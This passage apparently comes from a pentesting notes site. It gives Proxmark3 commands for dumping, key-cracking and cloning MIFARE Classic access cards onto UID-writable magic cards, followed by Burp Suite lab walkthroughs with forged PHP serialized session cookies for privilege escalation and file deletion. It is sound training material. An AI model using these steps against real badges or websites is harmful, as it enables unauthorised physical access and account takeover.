00 00 00 00 00 00 00 | ................ \n[=]      |  31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    8 |  32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    9 |  36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   10 |  40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   11 |  44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   12 |  48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   13 |  52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   14 |  56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   15 |  60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=] -----+-----+-------------------------------------------------+-----------------\n\n[+] Saved 1024 bytes to binary file `/home/ME/hf-mf-<UID>-dump.bin`\n[+] Saved to json file `/home/ME/hf-mf-<UID>-dump.json`\n

                            At this point we\u2019ve got everything we need from the card, we can take it off the reader.

                            Now there are two ways to proceed:

                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-1-cload","title":"Way 1: cload","text":"

                            Create an eml file with the previously obtained dump binary file:

                            # First go to <yourpath>/proxmark/tools/\ncd proxmark/tools/\n\n# Run the script pm3_mfd2eml.py \n python3 ./pm3_mfd2eml.py /home/PATH/hf-mf-<UI>-dump.bin /home/PATH/hf-mf-UID-dump.eml\n

                            Load the eml file into your magic card:

                            hf mf cload -f /home/PATH/hf-mf-<UID>-dump.eml\n
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-2-restore","title":"Way 2: restore","text":"

                            To copy that data onto a new card, place the (Chinese backdoor) card on the proxmark:

                            hf mf restore --1k --uid <UID\u00ba> -k /home/ME/hf-mf-<UID>-key.bin\n

                            This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command:

                            hf mf csetuid --uid <UID>\n
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#resources","title":"Resources","text":"

                            https://jaymonsecurity.com/seguridad-clonar-tarjeta-proxmark-red-team/

                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/","title":"Mifare Desfire","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/#basic-commands","title":"Basic commands","text":"
                            # Recover AIDs by bruteforce\nhf mfdes bruteaid\n
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/","title":"Installing proxmark3 RDV4.01 in Kali","text":"

                            Basic usage

                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#preparing-linux","title":"Preparing Linux","text":"

                            In my case, I will create a Virtual environment:

                            mkvirtualenv nfc\n

                            An system upgrade was carried out prior to following these instructions.

                            Update the packages list

                            sudo apt-get update\nsudo apt-get upgrade -y\nsudo apt-get auto-remove -y\n

                            Install the requirements

                            sudo apt-get install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev libssl-dev libgd-dev\n

                            Clone the repository:

                            git clone https://github.com/RfidResearchGroup/proxmark3.git\n

                            Check ModemManager. Make sure ModemManager will not interfere, otherwise it could brick your Proxmark3! Modem Manager must be discarded.

                            ModemManager is pre-installed on many different Linux distributions, very probably yours as well. It's intended to prepare and configure the mobile broadband (2G/3G/4G) devices, whether they are built-in or dongles. Some are serial, so when the Proxmark3 is plugged and a\u00a0/dev/ttyACM0\u00a0appears, ModemManager attempts to talk to it to see if it's a modem replying to AT commands. Now imagine what happens when you're flashing your Proxmark3 and ModemManager suddenly starts sending bytes to it at the same time... Yes it makes the flashing failing. And if it happens while you're flashing the bootloader, it will require a JTAG device to unbrick the Proxmark3. ModemManager is a threat for the Proxmark3, but also for many other embedded devices, such as some Arduino platforms.

                            # Solution 1: remove ModemManager\nsudo apt remove modemmanager\n\n# Solution 2: disable ModemManager\nsudo systemctl stop ModemManager\nsudo systemctl disable ModemManager\n

                            Troubleshooting issues with ModemManager

                            Connect your device using the USB cable and check that the proxmark is being picked up by your computer:

                            sudo dmesg | grep -i usb\n

                            It should show up as a CDC device:

                            usb 3-3: Product: proxmark3\nusb 3-3: Manufacturer: proxmark.org\nusb 3-3: SerialNumber: iceman\ncdc_acm 3-3:1.0: ttyACM0: USB ACM device\n

                            And a new\u00a0/dev/ttyACM0\u00a0should have appeared:

                            ls -la /dev | grep ttyACM0    \n

                            Get permissions to use /dev/ttyACM0. Add current user to the proper groups to get permission to use\u00a0/dev/ttyACM0. This step can be done from the Iceman Proxmark3 repo with:

                            make accessrights\n

                            Then, you need to logout and login in again for your new group membership to be fully effective.

                            To test you have the proper read & write rights, plug the Proxmark3 and execute:

                            [ -r /dev/ttyACM0 ] && [ -w /dev/ttyACM0 ] && echo ok\n

                            It must return ok. Otherwise this means you've got a permission problem to fix.

                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#compilation-instructions-for-rdv4","title":"Compilation instructions for RDV4","text":"

                            The repo defaults for compiling a firmware and client suitable for Proxmark3 RDV4.

                            Get the latest commits:

                            cd proxmark3\ngit pull\n

                            Clean and compile everything:

                            make clean && make -j\n

                            if you got an error, go to the\u00a0troubleshooting guide.

                            Install, but be carefull, if you do

                            sudo make install\n

                            Then the required files will be installed on your system, by default in\u00a0/usr/local/bin\u00a0and\u00a0/usr/local/share/proxmark3. Maintainers can read\u00a0this doc\u00a0to learn how to modify installation paths via\u00a0DESTDIR\u00a0and\u00a0PREFIX\u00a0Makefile variables.

                            The commands given in the documentation assume you did the installation step. If you didn't, you've to adjust the commands paths and files paths accordingly, e.g. calling\u00a0./pm3\u00a0or\u00a0client/proxmark3\u00a0instead of just\u00a0pm3\u00a0or\u00a0proxmark3.

                            In most cases, you can run the following script which try to auto-detect the port to use, on several OS:

                            pm3-flash-all\n

                            if not working: go to troubleshooting

                            Run the client: In most cases, you can run the script\u00a0pm3\u00a0which try to auto-detect the port to use, on several OS.

                            ./pm3\n

                            For the other cases, specify the port by yourself. For example, for a Proxmark3 connected via USB under Linux. Here, for example, for a Proxmark3 connected via USB under Linux (adjust the port for your OS):

                            proxmark3 /dev/ttyACM0\n

                            or from the local repo

                            client/proxmark3 /dev/ttyACM0\n

                            If all went well you should get some information about the firmware and memory usage as well as the prompt, something like this.

                            [=] Session log /home/iceman/.proxmark3/logs/log_20230208.txt\n[+] loaded from JSON file /home/iceman/.proxmark3/preferences.json\n[=] Using UART port /dev/ttyS3\n[=] Communicating with PM3 over USB-CDC\n\n\n  8888888b.  888b     d888  .d8888b.\n  888   Y88b 8888b   d8888 d88P  Y88b\n  888    888 88888b.d88888      .d88P\n  888   d88P 888Y88888P888     8888\"\n  8888888P\"  888 Y888P 888      \"Y8b.\n  888        888  Y8P  888 888    888\n  888        888   \"   888 Y88b  d88P\n  888        888       888  \"Y8888P\"    [ \u2615 ]\n\n\n [ Proxmark3 RFID instrument ]\n\n    MCU....... AT91SAM7S512 Rev A\n    Memory.... 512 Kb ( 66% used )\n\n    Client.... Iceman/master/v4.16191 2023-02-08 22:54:30\n    Bootrom... Iceman/master/v4.16191 2023-02-08 22:54:26\n    OS........ Iceman/master/v4.16191 2023-02-08 22:54:27\n    Target.... RDV4\n\n[usb] pm3 -->\n

                            This\u00a0[usb] pm3 --> \u00a0is the Proxmark3 interactive prompt.

                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#configuration-and-verification","title":"Configuration and Verification","text":"

                            Verify the status of your installation with:

                            script run init_rdv4\n

                            To make sure you got the latest sim module firmware:

                            hw status\n

                            If you get a message such as:

                            [#] Smart card module (ISO 7816)\n[#]   version................. vX.XX ( Outdated )\n

                            Then, the version is obsolete and you will need to update it. The following command upgrades your device sim module firmware. Don't not turn off your device during the execution of this command!! Even its a quite fast command you should be warned. You may brick it if you interrupt it.

                            smart upgrade -f /usr/local/share/proxmark3/firmware/sim014.bin\n\n# or if from local repo\nsmart upgrade -f sim014.bin\n

                            You get the following output if the execution was successful:

                            [=] --------------------------------------------------------------------\n[!] \u26a0\ufe0f  WARNING - sim module firmware upgrade\n[!] \u26a0\ufe0f  A dangerous command, do wrong and you could brick the sim module\n[=] --------------------------------------------------------------------\n\n[=] firmware file       sim014.bin\n[=] Checking integrity  sim014.sha512.txt\n[+] loaded 3658 bytes from binary file sim014.bin\n[+] loaded 158 bytes from binary file sim014.sha512.txt\n[=] Don't turn off your PM3!\n[+] Sim module firmware uploading to PM3...\n \ud83d\udd51 3658 bytes sent\n[+] Sim module firmware updating...\n[#] FW 0000\n[#] FW 0080\n[#] FW 0100\n[#] FW 0180\n[#] FW 0200\n[#] FW 0280\n[#] FW 0300\n[#] FW 0380\n[#] FW 0400\n[#] FW 0480\n[#] FW 0500\n[#] FW 0580\n[#] FW 0600\n[#] FW 0680\n[#] FW 0700\n[#] FW 0780\n[#] FW 0800\n[#] FW 0880\n[#] FW 0900\n[#] FW 0980\n[#] FW 0A00\n[#] FW 0A80\n[#] FW 0B00\n[#] FW 0B80\n[#] FW 0C00\n[#] FW 0C80\n[#] FW 0D00\n[#] FW 0D80\n[#] FW 0E00\n[+] Sim module firmware upgrade successful    \n

                            Run hw status command to verify that the upgrade went well.

                            hw status\n
                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3/","title":"Using Proxmark3 RDV4.01","text":"

                            Installation: Installing proxmark3 RDV4.01 in Kali

                            ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#basic-commands","title":"Basic commands","text":"
                            # The prompt will have this appearance\n[usb] pm3 --> \n\n# Display help and commands\nhelp\n\n# Close the client\nquit\n

                            To get an overview of the available commands for LF RFID and HF RFID:

                            [usb] pm3 --> lf\n[usb] pm3 --> hf\n

                            To search quickly for known LF or HF tags:

                            [usb] pm3 --> lf search\n[usb] pm3 --> hf search\n

                            To get info on a ISO14443-A tag:

                            [usb] pm3 --> hf 14a info\n

                            Read and write:

                            # Read sector 1 with key FFFFFFFFFFFF\nhf mf rdsc -s 1 -k FFFFFFFFFFFF\n\n# Read block 13 with key FFFFFFFFFFFF\nhf mf rdbl --blk 13 -k FFFFFFFFFFFF\n\n# Write block 8 with key a FFFFFFFFFFFF \nhf mf wrbl --blk 8 -a -k FFFFFFFFFFFF -d FFFFFFFFFFFF7F078800FFFFFFFFFFFF\n

                            Getting keys

                            # Check all sectors, all keys, 1K, and write to file\nhf mf chk --1k --dump             \n\n# Check for default keys:\nhf mf chk --1k -f mfc_default_keys\n\n# Check dictionary against block 0, key A\nhf mf chk -a --tblk 0 -f mfc_default_keys.dic       \n\n# Run autopwn, to extract all keys and backup a MIFARE Classic tag\nhf mf autopwn\n\n\nhf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n\n# Dump MIFARE Classic card contents:\nhf mf dump\nhf mf dump --1k -k hf-mf-A29558E4-key.bin -f hf-mf-A29558E4-dump.bin\n\n\n# Write to MIFARE Classic block:\nhf mf wrbl --blk 0 -k FFFFFFFFFFFF -d d3a2859f6b880400c801002000000016\n\n\n# Bruteforce MIFARE Classic card numbers from 11223344 to 11223346:\nscript run hf_mf_uidbruteforce -s 0x11223344 -e 0x11223346 -t 1000 -x mfc\n\n# Bruteforce MIFARE Ultralight EV1 card numbers from 11223344556677 to 11223344556679\nscript run hf_mf_uidbruteforce -s 0x11223344556677 -e 0x11223344556679 -t 1000 -x mfu\n
                            ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#next-steps","title":"Next steps","text":"
                            • https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
                            • https://github.com/Proxmark/proxmark3/wiki/Generic-ISO14443-Ops
                            • https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets
                            ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/rfid/","title":"RFID","text":"

                            RFID Reader continuously sends Radio Waves. When the Tag is in the range it sends its feedback signals to the read.

                            Types of RFID Frequencies. There are Three Basic Types of RFID Frequencies:

                            • Low Frequency (LF) 125 kHz or 134 kHz Range 8-10 cm
                            • High Frequency (HF) 13.56 MHz Range approx. 1 m
                            • Ultra High Frequency (UHF) 860-960 MHz Range 10 - 15 m
                            ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#quick-overview-of-arduino","title":"Quick Overview of Arduino","text":"
                            • Arduino is an open-source hardware
                            • Single board with microcontroller (ATmega328P )
                            • Attach different modules and sensors
                            • Different versions of Arduino

                            Download Arduino IDE.

                            ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#requirements","title":"Requirements","text":"

                            RFID Cards we need. - Mifare classic cards (1K, 4K, EV1): UID is not changeable. - Magic cards: In magic cards, UID is changeable.

                            For programming Mifare we will use

                            • ACR122u
                            • MFRC522 with STMB
                            • USB to TTL
                            • STM8 & STM32 USB
                            • Jumper wires (female to female)

                            More tools require:

                            • Arduino UNO
                            • RC522 Module
                            • OLED 4 Pin
                            • Breadboard
                            • Jumper wires
                            • Buzzer
                            ","tags":["pentesting","RFID"]},{"location":"burpsuite/burpsuite-broken-access-control/","title":"BurpSuite Labs - Broken access control vulnerabilities","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality","title":"Unprotected admin functionality","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation","title":"Enunciation","text":"

                            This lab has an unprotected admin panel.

                            Solve the lab by deleting the user\u00a0carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution","title":"Solution","text":"

                            See the robots.txt page. Enter the admin panel url in the browser and delete the user carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality-with-unpredictable-url","title":"Unprotected admin functionality with unpredictable URL","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_1","title":"Enunciation","text":"

                            This lab has an unprotected admin panel. It's located at an unpredictable location, but the location is disclosed somewhere in the application.

                            Solve the lab by accessing the admin panel, and using it to delete the user\u00a0carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_1","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-controlled-by-request-parameter","title":"User role controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_2","title":"Enunciation","text":"

                            This lab has an admin panel at\u00a0/admin, which identifies administrators using a forgeable cookie.

                            Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-can-be-modified-in-user-profile","title":"User role can be modified in user profile","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_3","title":"Enunciation","text":"

                            This lab has an admin panel at\u00a0/admin. It's only accessible to logged-in users with a\u00a0roleid\u00a0of 2.

                            Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#url-based-access-control-can-be-circumvented","title":"URL-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_4","title":"Enunciation","text":"

                            This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

                            To solve the lab, access the admin panel and delete the user carlos.`

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_4","title":"Solution","text":"

                            You will see a 302 and following the redirection, a 403, BUT update the lab page and you will see that lab was successfully passed.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#method-based-access-control-can-be-circumvented","title":"Method-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_5","title":"Enunciation","text":"

                            This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

                            To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter","title":"User ID controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_6","title":"Enunciation","text":"

                            This lab has a horizontal privilege escalation vulnerability on the user account page.

                            To solve the lab, obtain the API key for the user\u00a0carlos\u00a0and submit it as the solution.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-unpredictable-user-ids","title":"User ID controlled by request parameter, with unpredictable user IDs","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_7","title":"Enunciation","text":"

                            This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.

                            To solve the lab, find the GUID for carlos, then submit his API key as the solution.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-data-leakage-in-redirect","title":"User ID controlled by request parameter with data leakage in redirect","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_8","title":"Enunciation","text":"

                            This lab contains an access control vulnerability where sensitive information is leaked in the body of a redirect response.

                            To solve the lab, obtain the API key for the user carlos and submit it as the solution.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_8","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-password-disclosure","title":"User ID controlled by request parameter with password disclosure","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_9","title":"Enunciation","text":"

                            This lab has user account page that contains the current user's existing password, prefilled in a masked input.

                            To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_9","title":"Solution","text":"

                            Log in as administrator, go to the admin panel, and delete carlos.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#insecure-direct-object-references","title":"Insecure direct object references","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_10","title":"Enunciation","text":"

                            This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.

                            Solve the lab by finding the password for the user carlos, and logging into their account.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_10","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#multi-step-process-with-no-access-control-on-one-step","title":"Multi-step process with no access control on one step","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_11","title":"Enunciation","text":"

                            This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

                            To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_11","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#referer-based-access-control","title":"Referer-based access control","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_12","title":"Enunciation","text":"

                            This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

                            To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

                            ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_12","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-insecure-deserialization/","title":"BurpSuite Labs - Insecure deserialization","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-objects","title":"Modifying serialized objects","text":"

                            APPRENTICE Modifying serialized objects

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution","title":"Solution","text":"
                            # Burp solution\n\n1. Log in using your own credentials. Notice that the post-login `GET /my-account` request contains a session cookie that appears to be URL and Base64-encoded.\n2. Use Burp's Inspector panel to study the request in its decoded form. Notice that the cookie is in fact a serialized PHP object. The `admin` attribute contains `b:0`, indicating the boolean value `false`. Send this request to Burp Repeater.\n3. In Burp Repeater, use the Inspector to examine the cookie again and change the value of the `admin` attribute to `b:1`. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have accessed the page with admin privileges.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-data-types","title":"Modifying serialized data types","text":"

                            PRACTITIONER Modifying serialized data types

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_1","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_1","title":"Solution","text":"

                            Capture the Cookie session of the regular user wiener:peter. Send a request containing the cookie to Repeater module. Use the inspector to modify the value of the cookie:

                            Original values:

                            O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

                            Crafted values:

                            O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}\n

                            What we did:

                            • Update the length of the username attribute to 13.
                            • Change the username to administrator.
                            • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
                            • Update the data type label for the access token by replacing s with i.

                            # Burp solution\n1. Log in using your own credentials. In Burp, open the post-login `GET /my-account` request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.\n2. In Burp Repeater, use the Inspector panel to modify the session cookie as follows:\n\n    - Update the length of the `username` attribute to `13`.\n    - Change the username to `administrator`.\n    - Change the access token to the integer `0`. As this is no longer a string, you also need to remove the double-quotes surrounding the value.\n    - Update the data type label for the access token by replacing `s` with `i`.\n\n    The result should look like this:\n\n    `O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}`\n3. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have successfully accessed the page as the `administrator` user.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#using-application-functionality-to-exploit-insecure-deserialization","title":"Using application functionality to exploit insecure deserialization","text":"

                            PRACTITIONER Using application functionality to exploit insecure deserialization

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_2","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            You also have access to a backup account: gregg:rosebud

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_2","title":"Solution","text":"

                            In the user profile there is a DELETE feature that allows users to delete their profile. When doing so, the functionality of the application is relaying on the path provided in the cookie session (which is part of the user object) to remove the avatar.

                            Exploit would be changing the path to a file that we want to remove and update the string length of the path.

                            # Burp solution\n1. Log in to your own account. On the \"My account\" page, notice the option to delete your account by sending a `POST` request to `/my-account/delete`.\n2. Send a request containing a session cookie to Burp Repeater.\n3. In Burp Repeater, study the session cookie using the Inspector panel. Notice that the serialized object has an `avatar_link` attribute, which contains the file path to your avatar.\n4. Edit the serialized data so that the `avatar_link` points to `/home/carlos/morale.txt`. Remember to update the length indicator. The modified attribute should look like this:\n\n    `s:11:\"avatar_link\";s:23:\"/home/carlos/morale.txt\"`\n5. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n6. Change the request line to `POST /my-account/delete` and send the request. Your account will be deleted, along with Carlos's `morale.txt` file.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#arbitrary-object-injection-in-php","title":"Arbitrary object injection in PHP","text":"

                            PRACTITIONER Arbitrary object injection in PHP

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_3","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos's home directory. You will need to obtain source code access to solve this lab.

